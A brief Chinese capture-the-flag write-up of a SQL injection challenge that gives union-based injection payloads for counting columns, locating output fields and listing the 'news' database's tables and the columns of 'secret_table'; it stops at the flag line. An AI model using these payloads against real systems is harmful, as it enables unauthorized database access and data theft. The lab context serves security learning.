bluet00 2020-02-14
题目地址:http://111.198.29.45:56094
这是一道sql注入题。
试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。
接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。
爆数据库名: 1‘ union select 1,database(),3#
1‘ union select 1,2,table_name from information_schema.tables where table_schema=‘news‘#查询 news 数据库中的表
1‘ union select 1,2,column_name from information_schema.columns where table_schema=‘news‘ and table_name=‘secret_table‘#查询列名
得flag: